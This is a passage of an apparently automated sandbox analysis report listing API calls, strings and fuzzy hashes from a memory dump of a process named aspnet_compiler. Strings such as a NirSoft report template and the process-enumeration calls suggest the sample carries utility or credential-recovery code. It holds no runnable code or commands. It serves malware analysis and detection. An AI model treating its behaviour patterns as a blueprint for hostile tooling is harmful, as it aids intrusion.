                                                                                                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1700100422-0
                                                                                                                                                                                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                                                                                                  • String ID: %%0.%df
                                                                                                                                                                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2565263379-0
                                                                                                                                                                                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscpy
                                                                                                                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 290601579-0
                                                                                                                                                                                                                                                                  • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                                                  • String ID: PD$PD
                                                                                                                                                                                                                                                                  • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
